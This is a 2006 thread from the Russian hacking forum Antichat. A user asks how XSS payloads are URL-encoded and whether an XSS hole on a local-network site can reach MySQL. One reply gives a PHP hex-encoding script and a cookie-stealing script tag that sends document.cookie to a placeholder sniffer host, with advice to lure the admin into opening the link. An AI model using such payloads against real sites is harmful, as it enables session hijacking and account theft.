Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

21.02.2006, 23:10
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме: 1347867
Репутация:
408
|
|
Кодировка скриптов
Подскажите плз как кодируют скрипты?
Ну типа как при XSS например код что то вроде "><script>alert('lol')</script> а получаеться что то типа ...72%69%70%74%3e...
Да, и еще. Вот я в локалке нашел сайт, на котором дыра XSS, я попытался на прямую прописать <script>SHOW DATABASES;</script> После запроса оно меня посекло. Как можно спятать, или по другому добраться до MySQL?
|
|
|

21.02.2006, 23:42
|
|
Познающий
Регистрация: 09.09.2005
Сообщений: 90
Провел на форуме: 827197
Репутация:
22
|
|
вот скрипт:
<?
$str = urldecode($_SERVER['QUERY_STRING']);
for($i=0;$i<strlen($str);$i++) {
$hex=dechex(ord($str[$i]));
if($str[$i]=='&')
echo "$str[$i]";
else
echo "%$hex";
}
?>
а насчёт твоего вопроса про xss.
что ты там пишешь? что тебя просекло?
ты не то пишешь, тебе надо вставить место твоего(<script>SHOW DATABASES;</script>)непонятно кода, ссылку на снифер, примерно так: <script src="http://tvoi_snifer?"+document.cookie;></script> где "http://tvoi_snifer"-адрес снифера, куда придут куки.
ну и дать ету ссылку админу, как он пройдёт по этой ссылке, к тебе на снифер придут куки.
Последний раз редактировалось Evolution; 22.02.2006 в 00:02..
|
|
|

22.02.2006, 10:35
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме: 5888800
Репутация:
547
|
|
Что это такое (<script>SHOW DATABASES;</script>), в первые вижу такой запрос к базе, тебе надо прочитать синтаксисы в MySQL, или Sql-injection,статью, иши на форум их полно тута.
|
|
|

22.02.2006, 17:04
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме: 1347867
Репутация:
408
|
|
Вот такой общий вопрос, могу ли я через XSS как нить попасть в MySQL? Если да, то как? я даже не знаю имени базы
|
|
|

22.02.2006, 21:03
|
|
Banned
Регистрация: 06.10.2005
Сообщений: 180
Провел на форуме: 244618
Репутация:
-4
|
|
Нет не можешь ни как...!
Не считая получить shell найти пароль от sql
|
|
|

22.02.2006, 22:55
|
|
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме: 3212607
Репутация:
454
|
|
если не допёрло что делать из второго поста, иди сюда -> http://ha.ckers.org/xss.html, прокручивай в самый низ, ну а дальше и так всё ясно... 
|
|
|

22.02.2006, 23:49
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме: 1347867
Репутация:
408
|
|
Вы тут только не нервничайте =) Просто есть сайт (в локале) на котором есть дыра XSS. На сайте нет никакой страницы входа, она просто выводит данные из MySQL. Права на все папки выставлены. Есть способ пробраться в MySQL?
|
|
|

23.02.2006, 00:45
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме: 1941233
Репутация:
2726
|
|
Вы тут только не нервничайте =) Просто есть сайт (в локале) на котором есть дыра XSS. На сайте нет никакой страницы входа, она просто выводит данные из MySQL. Права на все папки выставлены. Есть способ пробраться в MySQL?
10000000 раз повторяем: XSS - дает возможность навредить ИСКЛЮЧИТЕЛЬНО браузеру жертвы. У тебя есть жертва, у которой нужно украсть куки, редиректнуть ее на другую страницу, и т д?
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|